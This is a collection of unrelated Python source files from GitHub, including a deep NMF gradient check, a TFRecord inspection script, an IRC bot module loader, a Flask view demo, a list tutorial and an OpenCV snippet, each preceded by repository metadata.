| no_license | https://github.com/DianYu420376/Full-Backprop-Test-on-20-News-1 | 25a53ca1bd20fbeba292b0c3a73e934d619a51f9 | 059b0cb48c2d0774c9ab42516cba73ad2212a71c | refs/heads/master | 2020-03-25T00:38:29.594455 | 2018-08-08T16:35:09 | 2018-08-08T16:35:09 | 143,196,357 | 0 | 0 | null | false | 2018-08-06T16:13:37 | 2018-08-01T18:57:53 | 2018-08-06T03:50:09 | 2018-08-06T16:13:37 | 207,624 | 0 | 0 | 0 | Jupyter Notebook | false | null |
# coding: utf-8
# In[11]:
# debugging the supervised version of deep NMF
import sys
package_dir = '../full_backprop_package/'
sys.path.append(package_dir)
import torch
from torch.autograd import Variable
from auxillary_functions import *
from pinv import PinvF
import numpy as np
from writer import Writer
from matplotlib import pyplot as plt
from lsqnonneg_module import LsqNonneg, LsqNonnegF
from deep_nmf import Fro_Norm
from pinv import PinvF
import torch.nn as nn
from twenty_news_group_data_loading import Y, target
# In[38]:
# Testing on a randomly generated dataset to see if it is the misuse of pytorch that caused the problem
# Interesting fact: L2 norm and cross-entropy are completely different! With cross-entropy it can get all 400 samples right,
# but with L2 it only gets around 310 at most
# The loss curve for cross-entropy is super weird... still looking into what has happened
# Doing it stochastically doesn't seem to affect the accuracy.
m = 100
n = 400
k = 20
net = LsqNonneg(m,k)
cr1 = Fro_Norm()
cr2 = Fro_Norm()
cr3 = nn.CrossEntropyLoss()
data = torch.abs(torch.randn(n, m)).double()
label = torch.from_numpy(Y[0:n,:]).double()
data, label = Variable(data), Variable(label)
label = torch.from_numpy(target[0:n]).long()
#label = torch.from_numpy(Y[0:n,:]).double()
W = Variable(torch.randn(k,k).double(),requires_grad = True)
epoch = 1000
lr = 10000
loss_lst = []
grad_lst = []
for epo in range(epoch):
net.zero_grad()
randperm = torch.randperm(n)
data_shuffle = data[randperm, :]
label_shuffle = label[randperm]
for i in range(1):
inputs = data_shuffle[i*n:(i+1)*n,:]
#label_ = label[i*400:(i+1)*400,:]
label_ = label_shuffle[i*n:(i+1)*n]
net.zero_grad()
S = net(inputs)
#pred = torch.mm(S,torch.mm(f(S),label_))
pred = torch.mm(S,W)
classification = cr3(pred, label_)
loss = classification
loss.backward()
print(epo, i, loss.data)
sys.stdout.flush()
loss_lst.append(loss.data)
if epo > 500 and loss.data/loss_lst[epo-1] >= 10:
# check gradient
grad_A = torch.zeros(grad_true_A.shape)
delta = 1e-6
f = LsqNonnegF.apply
for i in range(grad_A.shape[0]):
for j in range(grad_A.shape[1]):
A = A_previous
A_delta = A.clone()
A_delta[i,j] += delta
S_delta = f(inputs_previous, A_delta)
pred_delta = torch.mm(S_delta, W_previous)
loss_delta = cr3(pred_delta, label_previous)
grad_A[i,j] = (loss_delta - loss_previous)/delta
grad_error = torch.norm(grad_A - grad_true_A.float())
            print('the error between the autograd grad and the numeric grad:')
print(grad_error)
sys.stdout.flush()
grad_lst.append(grad_error)
np.savez('saved_data/check_gradient',loss_lst = loss_lst, grad_lst = grad_lst)
A_previous = net.A.data.clone()
inputs_previous = inputs.data.clone()
label_previous = label_.data.clone()
loss_previous = loss.data.clone()
grad_true_A = net.A.grad.data.clone()
W_previous = W.data.clone()
net.A.data = net.A.data.sub_(lr*net.A.grad.data)
net.A.data = net.A.data.clamp(min = 0)
W.data = W.data.sub_(lr*W.grad.data)
W.grad.zero_()
# In[39]:
# S = net(data)
# #pred = torch.mm(S,torch.mm(f(S),label))
# pred = torch.mm(S,W)
# #torch.sum(torch.argmax(label,1)== torch.argmax(pred,1))
# torch.sum(label == torch.argmax(pred,1))
# print(torch.sum(label == torch.argmax(pred,1)))
# plt.plot(loss_lst)
# plt.show()
| UTF-8 | Python | false | false | 3,745 | py | 28 | check_gradient.py | 17 | 0.608812 | 0.591455 | 0 | 120 | 30.191667 | 121 |
torms3/instance_segmentation_with_pixel_embeddings | 12,249,246,731,663 | 0e5f90e995d86bda9562f263a6884f2848623d82 | 214760d3005eba69d0f58e40f9eab1e31e9bbca4 | /check_tfrecords.py | 76aa0a31af0a4daed9831aad802c00b33cfc0435 | [
"MIT"
]
| permissive | https://github.com/torms3/instance_segmentation_with_pixel_embeddings | 8eb1bff948d584ebacecd6b9a51831ce447e7274 | befaeb9e0a6e79213b4da3d5c5ce5a7c21b0b070 | refs/heads/master | 2021-04-07T03:40:00.036873 | 2019-11-26T14:04:10 | 2019-11-26T14:04:10 | 248,641,816 | 1 | 0 | MIT | true | 2020-03-20T01:31:04 | 2020-03-20T01:31:03 | 2019-11-26T14:04:20 | 2019-11-26T14:04:18 | 133,839 | 0 | 0 | 0 | null | false | false | import tensorflow as tf
import numpy as np
import cv2
import os
import glob
import time
import shutil
from preprocess import extract_fn
from utils.img_io import save_indexed_png
dist_map_included = True
# dataset_dir = "./tfrecords/U2OScell/train"
# image_channels = 1
# image_depth = 'uint16'
dataset_dir = "./tfrecords/CVPPP2017/train"
image_channels = 3
image_depth = 'uint8'
test_dir = "./tfrecords_check"
if os.path.exists(test_dir):
shutil.rmtree(test_dir)
os.mkdir(test_dir)
time.sleep(1)
tfrecords = [os.path.join(dataset_dir, f)
for f in os.listdir(dataset_dir) if os.path.isfile(os.path.join(dataset_dir, f))]
dataset = tf.data.TFRecordDataset(tfrecords)
dataset = dataset.map(lambda x: extract_fn(x, image_channels=image_channels, image_depth=image_depth, dist_map=dist_map_included))
iterator = dataset.make_one_shot_iterator()
next_element = iterator.get_next()
with tf.Session() as sess:
for i in range(100):
sample = sess.run(next_element)
print(sample['image/filename'].decode("utf-8")+": height {}, width {}".format(sample['image/height'], sample['image/width']))
print("objects in total: {}".format(sample['image/obj_count']))
cv2.imwrite(os.path.join(test_dir, 'image'+str(i)+'.tif'), sample['image/image'])
save_indexed_png(os.path.join(test_dir, 'label'+str(i)+'.png'), sample['image/label'].astype(np.uint8))
if dist_map_included:
cv2.imwrite(os.path.join(test_dir, 'dist'+str(i)+'.png'), sample['image/dist_map']*255)
# print(sample['image/neighbor'][:,0:10])
| UTF-8 | Python | false | false | 1,589 | py | 23 | check_tfrecords.py | 22 | 0.679043 | 0.66331 | 0 | 46 | 33.543478 | 133 |
ArchiveTeam/VideoBot | 11,115,375,384,255 | 26b9acc70846cebc739578f2723b04a1b6e3cf5d | f0b50eb2e6491220da62af916088855fa2e6408c | /refresh.py | ea696b1b2bc2273c2f53430305712b9ec97570eb | []
| no_license | https://github.com/ArchiveTeam/VideoBot | aa63c02f0ce6039e0c494346091c498251fec448 | ad504e03c941c9a1ed7bc5c037f2336c4c9bc160 | refs/heads/master | 2021-01-17T07:09:51.056362 | 2017-12-03T00:59:18 | 2017-12-03T00:59:18 | 52,161,461 | 11 | 6 | null | null | null | null | null | null | null | null | null | null | null | null | null | from config import irc_channel
from config import github
import os
import services
import time
import re
import irc_bot
import periodical_jobs
import random
import string
import threading
import functions
periodical_job_start = lambda filename, type_, user: functions.periodical_job.periodical_job_start(filename, type_, user)
services_count = 0
services_list = [['service_name', 'service_regex', ['service_commands']]]
periodical_jobs_list = [['perjob_name', 'refreshtime']]
periodical_jobs_start = {}
def irc_bot_print(channel, message):
irc_bot.irc_bot_print(channel, message)
def refresh_services():
global services_list
global services_count
services_list = [['service_name', 'service_regex', ['service_commands']]]
new_services = 0
#if os.path.isdir('./services'):
# shutil.rmtree('./services')
#os.system('git clone ' + github + '.git')
#repository_name = re.search(r'([^\/]+)\/?$', github).group(1)
#shutil.copytree('./' + repository_name + '/services', './services')
#shutil.rmtree('./' + repository_name)
reload(services)
for root, dirs, files in os.walk("./services"):
for service in files:
if service.startswith("video__") and service.endswith(".py"):
if service[:-3] in services_list:
break
else:
try:
url_regex = eval('services.' + service[:-3] + '.url_regex')
except AttributeError:
url_regex = None
service_commands = eval('services.' + service[:-3] + '.service_commands')
services_list.append([service[:-3], url_regex, service_commands])
new_services += 1
print('Found service ' + service[:-3] + '.')
new_count = new_services-services_count
services_count = new_services
if new_count == 1:
irc_bot_print(irc_channel, 'Found and updated ' + str(new_count) + ' service.')
elif new_count != 0:
irc_bot_print(irc_channel, 'Found and updated ' + str(new_count) + ' services.')
def refresh_periodical_jobs():
global periodical_jobs_list
while True:
periodical_jobs_list_ = [['perjob_name', 'refreshtime']]
random_string = ''.join(random.choice(string.ascii_lowercase) for num in range(10))
for filename in os.listdir('periodical_jobs'):
if filename.endswith('.py') and filename not in ('check_temp_perjob.py', '__init__.py'):
filename_ = filename.replace('.py', random_string + '.py')
os.rename('periodical_jobs/' + filename, 'periodical_jobs/' + filename_)
reload(periodical_jobs)
time.sleep(10)
for filename in os.listdir('periodical_jobs'):
if filename.endswith(random_string + '.py'):
filename_ = filename.replace(random_string + '.py', '.py')
os.rename('periodical_jobs/' + filename, 'periodical_jobs/' + filename_)
for periodical_job_list_ in periodical_jobs_list_:
if filename[:-3] in periodical_job_list_:
break
else:
periodical_jobs_list_.append([filename[:-3], eval('periodical_jobs.' + filename[:-3] + '.refreshtime')])
print('Found periodical job ' + filename[:-13] + '.')
os.remove('periodical_jobs/' + filename + 'c')
periodical_jobs_list = list(periodical_jobs_list_)
time.sleep(300)
def refresh_periodical_jobs_start():
global periodical_jobs_list
global periodical_jobs_start
while True:
for periodical_job_list in periodical_jobs_list:
if periodical_job_list[0] != 'perjob_name':
periodical_job_name = periodical_job_list[0][:-10]
if periodical_job_name in periodical_jobs_start:
last_start = periodical_jobs_start[periodical_job_name]
else:
last_start = 0
current_time = int(time.time())
if last_start + periodical_job_list[1] <= current_time:
periodical_jobs_start[periodical_job_name] = current_time
threading.Thread(target = periodical_job_start, args = (periodical_job_list[0], eval('periodical_jobs.' + periodical_job_list[0] + '.type'), eval('periodical_jobs.' + periodical_job_list[0] + '.user'),)).start()
time.sleep(1)
def periodical_job_args(filename, args):
args_ = []
for arg in args:
try:
variable_content = eval('periodical_jobs.' + filename + '.' + arg)
except AttributeError:
variable_content = ''
args_.append(variable_content)
return args_
| UTF-8 | Python | false | false | 4,774 | py | 26 | refresh.py | 25 | 0.586301 | 0.579388 | 0 | 107 | 43.616822 | 231 |
mathieubonnet/capsul | 4,664,334,519,323 | 63402d3ae9a71b5beb01a42b608c5cbb1261a212 | f6a24e51b6012b582d76db0b2e1e27950729b7bb | /capsul/wip/apps_qt/capsulview | b406ea1829809f04ddd26e49b97cb800de7dc52f | [
"LicenseRef-scancode-cecill-b-en"
]
| permissive | https://github.com/mathieubonnet/capsul | 391733a2391c1191b643e6847b5f757cf77c1255 | c9745e339c24fc6a27d0adcc1e0c91b355588cac | refs/heads/master | 2020-04-09T02:54:29.257904 | 2015-03-04T14:36:08 | 2015-03-04T14:36:08 | 31,950,724 | 0 | 0 | null | true | 2015-03-10T10:11:37 | 2015-03-10T10:11:37 | 2015-03-10T10:11:33 | 2015-03-04T14:36:08 | 4,779 | 0 | 0 | 0 | null | null | null | #! /usr/bin/env python
##########################################################################
# CAPSUL - Copyright (C) CEA, 2013
# Distributed under the terms of the CeCILL-B license, as published by
# the CEA-CNRS-INRIA. Refer to the LICENSE file or to
# http://www.cecill.info/licences/Licence_CeCILL-B_V1-en.html
# for details.
##########################################################################
# System import
import logging
import sys
# Capsul import
from soma.qt_gui import qt_backend
# TODO: add option to set backend before importing QtCore
#qt_backend.set_qt_backend("PyQt4")
#qt_backend.init_matplotlib_backend()
from soma.qt_gui.qt_backend import QtCore
try :
from capsul.apps_qt.pipeline_viewer_app import PipelineViewerApp
app = PipelineViewerApp()
except :
import sys
import traceback
exc_info = sys.exc_info()
trace = "".join(traceback.format_exception(*exc_info))
logging.error(trace)
else :
QtCore.QObject.connect(app, QtCore.SIGNAL('lastWindowClosed()'),
app, QtCore.SLOT('quit()'))
sys.exit(app.exec_())
| UTF-8 | Python | false | false | 1,106 | 41 | capsulview | 37 | 0.604882 | 0.599458 | 0 | 37 | 28.864865 | 74 |
|
linrong/flask-practice | 7,679,401,535,989 | 5f582adb76386012ae98a8c0a2f0f4dc2f739104 | 3f1918a279e807505c6fa13a597eb0d121a095f6 | /flask_demo/3/view_demo4/method_view.py | 03286b26585d9b0a44d27f66a8fe1d530af3bf75 | [
"MIT"
]
| permissive | https://github.com/linrong/flask-practice | b177d5f52c4b55e78bbd5bf14c47decd74c87a28 | 91ec9d8219482562cb95a1df9ff846f9ca7ea9f1 | refs/heads/master | 2020-09-22T18:13:19.673917 | 2019-04-16T08:23:18 | 2019-04-16T08:23:18 | 225,296,899 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | from flask import Flask,jsonify
from flask.views import MethodView
app=Flask(__name__)
# Method-dispatch based view: each HTTP method is handled by a different function, similar to a RESTful API
class UserAPI(MethodView):
def get(self):
return jsonify({
'username':'fake',
            'avatar':'http://lorempixel.com/100/100/nature'
})
def post(self):
return 'UNSUPPORTED!'
app.add_url_rule('/user',view_func=UserAPI.as_view('userview'))
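# Example (illustrative): with the app running on port 9001,
#   GET  http://localhost:9001/user  -> the JSON payload above
#   POST http://localhost:9001/user  -> 'UNSUPPORTED!'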
if __name__=='__main__':
app.run(host='0.0.0.0',port=9001)
| UTF-8 | Python | false | false | 540 | py | 43 | method_view.py | 34 | 0.622951 | 0.594262 | 0 | 19 | 24.684211 | 63 |
socketwiz/pi-wall-project | 5,617,817,239,799 | d8711680538fbb56d72dbd44a92cac172fda7944 | 9763810c6017f5b7ce6d681bc931a24c45786655 | /pi_wall_project/bus/views.py | ce0d4eab2bd07600802f893219345068abc4f2eb | []
| no_license | https://github.com/socketwiz/pi-wall-project | c29628335b4690e09b735a17c121a19bbc869694 | f8d2f459c3a1117fcd0f5f934a308b24446395dd | refs/heads/master | 2021-09-10T22:02:51.796093 | 2021-03-01T13:10:42 | 2021-03-01T13:10:42 | 56,316,370 | 0 | 0 | null | false | 2021-09-10T18:16:54 | 2016-04-15T11:50:29 | 2021-03-01T13:10:48 | 2021-09-10T18:16:53 | 22,846 | 0 | 0 | 39 | JavaScript | false | false | from django.http import JsonResponse
from django.shortcuts import render
from .models import Holiday, Schedule
from .serializers import HolidaySerializer, ScheduleSerializer
from rest_framework import generics
import os, pyaudio, _thread, wave
def play_sound():
alarm = 'school-bell.wav'
chunk = 1024
try:
sound = wave.open('bus/media/%s' % alarm, 'rb')
except FileNotFoundError:
print('%s/bus/media/%s not found' % (os.getcwd(), alarm))
else:
pa = pyaudio.PyAudio()
stream = pa.open(format = pa.get_format_from_width(sound.getsampwidth()),
channels = sound.getnchannels(),
rate = sound.getframerate(),
output = True)
data = sound.readframes(chunk)
while data:
stream.write(data)
data = sound.readframes(chunk)
stream.stop_stream()
stream.close()
pa.terminate()
def index(request):
return render(request, 'bus/index.html')
def alarm(request):
_thread.start_new_thread(play_sound, ())
return JsonResponse({'msg': 'alarm sounding'})
class BusScheduleCreate(generics.ListCreateAPIView):
queryset = Schedule.objects.all()
serializer_class = ScheduleSerializer
class BusHolidayCreate(generics.ListCreateAPIView):
queryset = Holiday.objects.all()
serializer_class = HolidaySerializer
| UTF-8 | Python | false | false | 1,412 | py | 52 | views.py | 40 | 0.644476 | 0.641643 | 0 | 55 | 24.672727 | 81 |
paigekehoe/slacktactoe | 12,627,203,886,802 | 867ebf84dc56050412218d3ddb490356061b00e7 | e1427e6dae356d9af99fd961023581787cdb2b49 | /app.py | 0833c1776ea8f937801db3919015d81ab4493969 | [
"MIT"
]
| permissive | https://github.com/paigekehoe/slacktactoe | 5cf96ec163ffebbe366ec628576feef521298ae6 | 1758e48a2f2b46fdfb6ccdb068c567fbdfb3592a | refs/heads/master | 2021-07-25T09:04:51.067440 | 2017-11-07T18:26:48 | 2017-11-07T18:26:48 | 109,851,064 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import os
import re
from slackclient import SlackClient
from flask import Flask, request, jsonify, abort
import game
import keys
## A simple tic tac toe slack application
## Author: Paige Kehoe
## Date: 11/6/17
SLACK_TOKEN = os.environ['SLACK_TOKEN']
## getting the SLACK_TOKEN from hidden variable :)
active_games = {}
slack_client = SlackClient(SLACK_TOKEN)
#key for board to display for users in help
board_key = "| 1 | 2 | 3 |\n|----+----+----|\n| 4 | 5 | 6 |\n|----+----+----|\n| 7 | 8 | 9 |"
app = Flask(__name__)
def setup():
channels_call = slack_client.api_call("channels.list", exclude_archived=1)
lookup_table = {}
if channels_call.get('ok'):
        for channel in channels_call['channels']:
            lookup_table[channel['id']] = None
return lookup_table
return None
def validate_user():
pass
def new_game(channel_id, player0, player1):
#check if game exists in channel lookup
test_game = active_games.get(channel_id, None)
if test_game != None:
message = {
"response_type":"ephemeral",
"text": "I'm sorry there is already an active game in this channel",
}
#check for playing self or for null opponent
elif (player1 == "") or (player0 == player1):
message = {
"response_type":"ephemeral",
"text": "That is not a valid opponent in this channel",
}
else:
#TO DO validate both users are in channel and not deleted - (player1 not in channel_id.info.members)
new_game = game.Game()
tempStr =player1.split("|")
player1 = tempStr[0][2:]
new_game.set_up(player0, player1)
active_games[channel_id]=new_game
message = {
"response_type":"ephemeral",
"text": "Please input a cell number with the command /ttt move # to make your first move\n" + board_key,
}
return message
def help(channel_id):
help_str = "All possible commands for tic tac toe are below:\n /ttt help: list commands\n/ttt play @username: starts new game\n/ttt move #: adds an X or O to that space on the board\n/ttt quit: quit game\nTo make a move, select from the following space options:\n" + board_key + ""
message = {
"response_type": "ephemeral",
"text": help_str,
}
return message
def end_game(channel_id, user_id):
game_obj = active_games.get(channel_id, None)
#check if no game is in the channel
if game_obj == None:
message = {
"response_type":"ephemeral",
"text": "Sorry there is no active game in this channel at this time."
}
return message
    if user_id is not None and user_id not in (game_obj.player_0, game_obj.player_1):
        message = {
            "response_type":"ephemeral",
            "text": "Don't be silly! You can't quit someone else's game"
        }
        return message
if game_obj.end_condition == 0:
#Call P0/Os Win Message
message = {
"response_type": "in_channel",
"text": "Hey <@"+ channel_id + "> we have a tic tac toe winner and it's: <@" + game_obj.player_0 + ">\n" + print_board(game_obj.board),
}
elif game_obj.end_condition == 3:
#Call P1/Xs Win Message
message = {
"response_type": "in_channel",
"text": "Hey <@"+ channel_id + "> we have a tic tac toe winner and it's: <@" + game_obj.player_1 + ">\n" + print_board(game_obj.board),
}
elif game_obj.end_condition == 4:
#Call draw game
message = {
"response_type": "in_channel",
"text": "Hey <@"+ channel_id + "> this game is over and it ended in a draw :(\n" + print_board(game_obj.board),
}
elif user_id != None:
message = {
"response_type": "in_channel",
"text":"<@"+ user_id + "> decided to quit the game :(",
}
active_games[channel_id]=None
return message
def print_board(board):
#input parameter: board list from Game class
display_board = ""
counter = 1
for spot in board:
if spot == 0:
#append O to board spot
display_board += " :o: "
elif spot == 1:
#aapend X to board spot
display_board += " :heavy_multiplication_x: "
elif spot == 9:
#append blank to board spot
display_board += " "
if counter in (1, 2, 4, 5, 7, 8):
display_board += "|"
if counter in (3, 6):
display_board += "\n---------------------\n"
counter +=1
return display_board
def move(channel_id, request, player):
game = active_games.get(channel_id, None)
message = {
"response_type": "ephemeral",
"text": "Sorry that was invalid, please select a number from the following configuration",
}
if game == None:
message = {
"response_type": "ephemeral",
"text": "Sorry there is no active game in this channel at this time.",
}
return message
    print("statement " + game.player_1 + " and this is counter: " + str(game.turn_count) + " and this is p0 " + game.player_0 + " and this is player " + player)
    # sample output: statement U7VQCMCKG and this is counter: 0 and this is p0 U7V2GQZ9T and this is player U7V2GQZ9T
if (game.turn_count%2 == 1 and player != game.player_1):
message = {
"response_type": "ephemeral",
"text": "Nice try! But it's not your turn",
}
return message
if (game.turn_count%2 == 0 and player != game.player_0):
message = {
"response_type": "ephemeral",
"text": "Nice try! But it's not your turn",
}
return message
try:
number = int(request)
except:
message = {
"response_type": "ephemeral",
"text": "That is not a valid move",
}
return message
if game.is_free(number) == False:
message = {
"response_type": "ephemeral",
"text": "That is not a valid move",
}
return message
#TO DO: verify player is in game and channel
if player == game.player_0 and game.turn_count == 0:
p0 = "<@"+player+">"
#first move scenario
game.turn(number)
message = {
"response_type":"in_channel",
"text": "<@" + game.player_0 + "> has challenged <@" + game.player_1 + "> to a game of tic tac toe!\nCurrent board is\n"+print_board(game.board) + "\n<@" + game.player_1 + "> please make your move",
}
return message
game.turn(number)
if game.check_win() == True:
return end_game(channel_id, player)
else:
message = {
"response_type":"in_channel",
"text": "current board status:\n" + print_board(game.board),
}
return message
##if statement to determine responses to /ttt command
##valid input params: command, @username, space to move
#ttt play @username - set up new game against that opponent
#ttt move # - makes a move by number space
#ttt quit - ends game in channel
#ttt help - displays all command options
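# example session (illustrative):
#   /ttt play @alice  - starts a new game against alice in this channel
#   /ttt move 5       - places a mark in the center cell
#   /ttt quit         - ends the active game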
@app.route('/', methods=['POST'])
def index():
parameters = ['play','quit','move','help', 'gamestatus']
info = request.form
token = info.get('token', None)
command = info.get('command', None)
text = info.get('text', None)
channel = info.get('channel_id')
response = {
"response_type": "ephemeral",
"text":"I'm not sure what you are trying to say.\nPlease type /ttt help to see a list of valid commands",
}
##if invalid token
# if token != SLACK_TOKEN:
# return "Invalid token for /ttt"
if 'ttt' not in command:
return "invalid request"
if 'play' in text:
p0 = info.get('user_id')
p1 = str(text[5:])
response = new_game(channel, p0, p1)
if 'move' in text:
space = str(text[5:])
response = move(channel, space, info.get('user_id'))
if text == 'quit':
player = info.get('user_id')
response = end_game(channel, player)
if text == 'help':
response = help(channel)
return jsonify(response)
if __name__ == '__main__':
app.debug = False
app.run('0.0.0.0', 5000) | UTF-8 | Python | false | false | 8,342 | py | 3 | app.py | 2 | 0.560657 | 0.550108 | 0 | 243 | 33.333333 | 285 |
gduvalsc/kairos | 13,228,499,304,562 | 6e1e1ea750d97b83179e9cf2470bc7c502e329cb | 035a3eebe2091897b942796781a192f67680b336 | /worker.py | 781c2a70051ece0aee5cff606df3664ea63e51ee | []
| no_license | https://github.com/gduvalsc/kairos | 763eb8fa5daeefc5fd46ea066a47400d5be7b7f5 | 2bf863ba3f73fc16ef75842ad390eb55fb1906f1 | refs/heads/master | 2021-12-23T18:33:34.382989 | 2021-10-19T16:44:00 | 2021-10-19T16:44:00 | 77,072,517 | 4 | 3 | null | null | null | null | null | null | null | null | null | null | null | null | null | import pykairos
application = pykairos.KairosWorker().application | UTF-8 | Python | false | false | 65 | py | 139 | worker.py | 130 | 0.861538 | 0.861538 | 0 | 2 | 32 | 49 |
yumingzhu/pydemo | 1,855,425,909,131 | 8d90ce88557324e926884df167cad56f8c34320a | 7935d5e1b2e97c5b2933df32a2a4086d7de076bc | /demo/selenium/demoCSDN.py | f4b957ef33b7aff6ecebdcb026c087690899dee7 | []
| no_license | https://github.com/yumingzhu/pydemo | 6b1d0f06c65ee836d7e667ee63cd0d35f634b438 | 6b204723a0a7f08a36883c8db35355a6c8e8526b | refs/heads/master | 2022-12-10T07:11:32.723391 | 2020-08-28T09:48:51 | 2020-08-28T09:48:51 | 291,010,541 | 0 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import time
from retrying import retry
from selenium import webdriver
@retry(stop_max_attempt_number=3)
def getToCsdn():
time.sleep(30)
options = webdriver.ChromeOptions()
prefs = {
'profile.default_content_setting_values': {
'images': 2
}
}
options.add_experimental_option('excludeSwitches', ['enable-automation'])
options.add_experimental_option('prefs', prefs)
driver = webdriver.Chrome(executable_path="G:/pywork/chromedriver.exe", options=options)
count = 0
while True:
driver.get("https://blog.csdn.net/yumingzhu1/article/details/108254255")
time.sleep(20)
js = 'window.scrollTo(0,500)'
driver.execute_script(js)
time.sleep(10)
time.sleep(30)
count = count + 1
print(count)
driver.back()
if __name__ == '__main__':
getToCsdn()
| UTF-8 | Python | false | false | 876 | py | 37 | demoCSDN.py | 37 | 0.626712 | 0.597032 | 0 | 31 | 27.258065 | 92 |
InCodeLearning/InCodeLearning-Python3 | 1,760,936,596,882 | 452fa494a830a5c7d6d89323be4f80539d62e6c5 | 103bfe29fa92dc02411dad257e4486d5a71075d7 | /built_ins/sequence_list.py | 2d7fc55f4b59c9d9b366f6f064433da195fab793 | []
| no_license | https://github.com/InCodeLearning/InCodeLearning-Python3 | 85eed07242d869ddfef57895c60c7987e5266b83 | 6968983514e696472d13ef62ebae59828a8da44b | refs/heads/master | 2022-12-21T23:39:42.298427 | 2021-02-24T02:45:45 | 2021-02-24T02:45:45 | 63,978,085 | 8 | 3 | null | false | 2016-11-19T03:05:47 | 2016-07-22T19:26:39 | 2016-10-18T17:27:45 | 2016-11-19T03:05:46 | 232 | 8 | 4 | 1 | Python | null | null | # C source https://github.com/python/cpython/blob/master/Include/listobject.h
# dynamic array, not linked list
# an array can only contain items of the same type,
# mostly numbers (as in a numpy array), to handle large data sets efficiently
# list is mutable
# using list as a queue, not efficient
queue = [0, 1, 2, 3, 4]
queue.append(5)
queue.append(6)
print(queue)
queue.pop(0)
print(queue) # elements 1-6 shifted left by one O(n) time
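
# a more efficient queue, a minimal sketch added for illustration (not part of
# the original): collections.deque pops from the left in O(1) instead of
# shifting every element like list.pop(0)
from collections import deque
dq = deque([0, 1, 2, 3, 4])
dq.append(5)  # O(1) append on the right
print(dq.popleft())  # 0, O(1) removal from the left
print(dq)  # deque([1, 2, 3, 4, 5])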
l = [True, 2, 3.5, 5 - 8j, [9, 7, 5], 'python', ('a', 2)]
print(hex(id(l))) # 0x2564cb0 memory address (32 bit?), machine dependent.
print(len(l)) # 7
# slicing, not including the second slice index
print(l[:5]) # [True, 2, 3.5, 5-8j, [9, 7, 5]],
# list index
print(l[0]) # True
print(l[-7]) # True list[-n] == list[len(list) - n]
# print(l[-8]) Error, index out of range, not intuitive
print(l[4:-1]) # [[9, 7, 5], 'python'], combination of pos & neg index
print(l[4:-6]) # [], if 2nd slice index on the left of 1st one
print("4:-8", l[4:-8]) # not intuitive, no error
print(l[6:3]) # [], same reason as above one
print("======adding items to a list======")
print(l + ['concat', 'at', 'end']) # list concat, create a new list
l.append([1, 2, 3]) # add a sublist
print(l)
# [True, 2, 3.5, (5-8j), [9, 7, 5], 'python', ('a', 2), [1, 2, 3]]
l.extend([4, 5, 'a']) # add three numbers
print(l)
# [True, 2, 3.5, (5-8j), [9, 7, 5], 'python', ('a', 2), [1, 2, 3], 4, 5, 'a']
l.insert(0, 'a') # assign item to specific position
print(l)
print("======searching for values in a list======")
print(l.count('a')) # 2, return # how many items that item shows in the list
print(l.count(2)) # 1, item in the sublist is not counted
print(l.index('a')) # return to the first match item
# -1 is valid index for list, raise exception is better than return -1
try:
print('a is in l', l.index('a'))
print(l.index('not in l'))
except ValueError:
print('"not in l" is not in l')
print("======removing list items======")
l.remove('a') # delete the first match item
print(l)
# [True, 2, 3.5, (5-8j), [9, 7, 5], 'python', ('a', 2), [1, 2, 3], 4, 5, 'a']
del l[1]
l.pop() # remove the last item
print(l)
# [True, 2, 3.5, (5-8j), [9, 7, 5], 'python', ('a', 2), [1, 2, 3], 4, 5]
# print(l.sort()) exception, TypeError: unorderable types: complex() < float()
l.remove(l[3]) # remove assigned index item
print(l) # [True, 2, 3.5, [9, 7, 5], 'python', ('a', 2), [1, 2, 3], 4, 5]
# print(l.sort()) TypeError: unorderable types: list() < float(),
# l.sort() should be used in homogeneous type list
l.pop(3) # remove the assigned index item, l.pop(1) or l.pop([1])
l.pop(-3)
l.pop(-3)
print(l) # [True, 2, 3.5, 'python', 4, 5]
print(hex(id(l)))  # same address as at the start: in-place methods never rebind l
ls = [i for i in range(5)]
print(ls) # [0, 1, 2, 3, 4]
print(hex(id(ls))) # 0x764cd8
ls.sort(reverse=True)
print(ls) # [ 4, 3, 2, 1, 0]
l_string = ['a', 'p', 'Python', 'C', 'c#', 'c++']
l_string.sort()
print(l_string) # ['C', 'Python', 'a', 'c#', 'c++', 'p']
l_str = [i.lower() for i in l_string]
print(l_str) # ['c', 'python', 'a', 'c#', 'c++', 'p']
l_str.sort()
print(l_str) # ['a', 'c', 'c#', 'c++', 'p', 'python']
l2 = [4, 3, 2, 1, 0]
print(hex(id(l2))) # 0x554d50
print(ls == l2) # True, the comparison is not address, but content
l.reverse()
print(l) # [5, 4, 'python', 3.5, 2, True]
# TODO: compare shallow vs. deep copy (see the sketch below)
l_new = l.copy()
l_new2 = l[:]
print(l_new, l_new2)
# [5, 4, 'python', 3.5, 2, True] [5, 4, 'python', 3.5, 2, True]
print(hex(id(l)), hex(id(l_new)), hex(id(l_new2)))
# memory addresses are different.
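
# A minimal sketch of shallow vs. deep copy for the TODO above (illustrative,
# not part of the original): a shallow copy shares nested objects, a deep copy
# does not.
import copy
nested = [[1, 2], 3]
shallow = nested.copy()  # or nested[:]
deep = copy.deepcopy(nested)
nested[0].append(99)
print(shallow)  # [[1, 2, 99], 3], the inner list is shared
print(deep)  # [[1, 2], 3], fully independent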
# A tuple is an immutable list. Once it is created, it cannot be changed.
# Tuples support the list methods that do not mutate the sequence;
# mutating methods such as insert(), extend() and remove() are unavailable.
| UTF-8 | Python | false | false | 3,778 | py | 45 | sequence_list.py | 38 | 0.592642 | 0.540233 | 0 | 114 | 32.140351 | 78 |
sdYoo/ImgRecogSystem | 7,138,235,682,649 | 95d7937d860a04c3d6e55d71bdd9784278bbc907 | cc4878e8ebfa86387e7ae0c13a89815007da3d3a | /ProbabilisticHoughTransform.py | d20dcd603b5d919850f65e1a0d66e3b0107eeb78 | []
| no_license | https://github.com/sdYoo/ImgRecogSystem | fda2b8b3582d0c580591e2ab51a6a0997f1dd5de | c6ef7f82560542f8d7ea4fe37b71ddea2aa31758 | refs/heads/master | 2022-10-28T12:50:41.080308 | 2020-06-10T11:34:13 | 2020-06-10T11:34:13 | 271,174,885 | 1 | 0 | null | null | null | null | null | null | null | null | null | null | null | null | null | import cv2
import numpy as np
def show_ProbabilisticHoughTransform():
img = cv2.imread('images/20200610-sudoku-01.jpg')
gray = cv2.cvtColor(img,cv2.COLOR_BGR2GRAY)
edges = cv2.Canny(gray,50,150,apertureSize = 3)
